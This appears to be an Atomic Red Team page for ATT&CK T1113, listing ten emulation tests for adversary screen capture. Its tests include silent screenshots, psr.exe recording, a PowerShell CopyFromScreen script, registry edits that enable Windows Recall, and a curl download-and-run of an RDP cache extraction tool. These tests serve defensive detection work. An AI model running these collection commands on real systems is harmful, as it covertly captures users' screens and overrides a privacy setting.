Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as
CopyFromScreen,xwd, orscreencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)
- Atomic Test #1: Screencapture
- Atomic Test #2: Screencapture (silent)
- Atomic Test #3: X Windows Capture
- Atomic Test #4: X Windows Capture (freebsd)
- Atomic Test #5: Capture Linux Desktop using Import Tool
- Atomic Test #6: Capture Linux Desktop using Import Tool (freebsd)
- Atomic Test #7: Windows Screencapture
- Atomic Test #8: Windows Screen Capture (CopyFromScreen)
- Atomic Test #9: Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted
- Atomic Test #10: RDP Bitmap Cache Extraction via bmc-tools
Use screencapture command to collect a full desktop screenshot
Supported Platforms: macOS
auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Output file path | path | /tmp/T1113_desktop.png |
screencapture #{output_file}rm #{output_file}Use screencapture command to collect a full desktop screenshot
Supported Platforms: macOS
auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Output file path | path | /tmp/T1113_desktop.png |
screencapture -x #{output_file}rm #{output_file}Use xwd command to collect a full desktop screenshot and review file with xwud
Supported Platforms: Linux
auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Output file path | path | /tmp/T1113_desktop.xwd |
| package_checker | Package checking command for linux. Debian system command- dpkg -s x11-apps | string | rpm -q xorg-x11-apps |
| package_installer | Package installer command for linux. Debian system command- apt-get install x11-apps | string | yum install -y xorg-x11-apps |
xwd -root -out #{output_file}
xwud -in #{output_file}rm #{output_file}if #{package_checker} > /dev/null; then exit 0; else exit 1; fisudo #{package_installer}Use xwd command to collect a full desktop screenshot and review file with xwud
Supported Platforms: Linux
auto_generated_guid: 562f3bc2-74e8-46c5-95c7-0e01f9ccc65c
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Output file path | path | /tmp/T1113_desktop.xwd |
xwd -root -out #{output_file}
xwud -in #{output_file}rm #{output_file}if [ -x "$(command -v xwd)" ]; then exit 0; else exit 1; fi
if [ -x "$(command -v xwud)" ]; then exit 0; else exit 1; fipkg install -y xwd xwudUse import command from ImageMagick to collect a full desktop screenshot
Supported Platforms: Linux
auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Output file path | path | /tmp/T1113_desktop.png |
import -window root #{output_file}rm #{output_file}if import -help > /dev/null 2>&1; then exit 0; else exit 1; fisudo apt install graphicsmagick-imagemagick-compatUse import command from ImageMagick to collect a full desktop screenshot
Supported Platforms: Linux
auto_generated_guid: 18397d87-38aa-4443-a098-8a48a8ca5d8d
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Output file path | path | /tmp/T1113_desktop.png |
import -window root #{output_file}rm #{output_file}if import -help > /dev/null 2>&1; then exit 0; else exit 1; fipkg install -y ImageMagick7Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour
Supported Platforms: Windows
auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Output file path | path | c:\temp\T1113_desktop.zip |
| recording_time | Time to take screenshots | integer | 5 |
cmd /c start /b psr.exe /start /output #{output_file} /sc 1 /gui 0 /stopevent 12
Add-Type -MemberDefinition '[DllImport("user32.dll")] public static extern void mouse_event(int flags, int dx, int dy, int cButtons, int info);' -Name U32 -Namespace W;
[W.U32]::mouse_event(0x02 -bor 0x04 -bor 0x01, 0, 0, 0, 0);
cmd /c "timeout #{recording_time} > NULL && psr.exe /stop"rm #{output_file} -ErrorAction IgnoreTake a screen capture of the desktop through a call to the [Graphics.CopyFromScreen] .NET API. [Graphics.CopyFromScreen]: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen
Supported Platforms: Windows
auto_generated_guid: e9313014-985a-48ef-80d9-cde604ffc187
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Path where captured results will be placed | path | $env:TEMP\T1113.png |
Add-Type -AssemblyName System.Windows.Forms
$screen = [Windows.Forms.SystemInformation]::VirtualScreen
$bitmap = New-Object Drawing.Bitmap $screen.Width, $screen.Height
$graphic = [Drawing.Graphics]::FromImage($bitmap)
$graphic.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bitmap.Size)
$bitmap.Save("#{output_file}")Remove-Item #{output_file} -ErrorAction IgnoreDetects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value. Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
- https://learn.microsoft.com/en-us/windows/client-management/manage-recall
- https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis
Supported Platforms: Windows
auto_generated_guid: 5a496325-0115-4274-8eb9-755b649ad0fb
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /t REG_DWORD /d 0 /f
reg delete "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /freg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /t REG_DWORD /d 1 /fSimulates an attacker extracting the RDP bitmap cache using the ANSSI "bmc-tools.py" script. This test requires valid RDP bitmap cache files to exist on the system (usually created after an outgoing RDP connection is made).
Supported Platforms: Windows
auto_generated_guid: 98f19852-7348-4f99-9e15-6ff4320464c7
| Name | Description | Type | Default Value |
|---|---|---|---|
| cache_path | Path to the RDP Cache directory or specific .bmc file | path | $env:LOCALAPPDATA\Microsoft\Terminal Server Client\Cache |
| output_dir | Directory to save reconstructed images | path | $env:TEMP\rdp_screens |
$url = 'https://raw.githubusercontent.com/ANSSI-FR/bmc-tools/master/bmc-tools.py'
$toolsDir = "$env:TEMP\bmc-tools.py"
# create output directory
New-Item -ItemType Directory -Path #{output_dir} -Force | Out-Null
# python script download
& curl.exe -L $url --output $toolsDir
# execution step
if (Test-Path $toolsDir) { python $toolsDir -s "#{cache_path}" -d #{output_dir} -b }Remove-Item "$env:TEMP\bmc-tools.py" -ErrorAction SilentlyContinue
Remove-Item #{output_dir} -Recurse -Force -ErrorAction SilentlyContinueif (Get-Command python -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }Write-Host "Please install Python manually."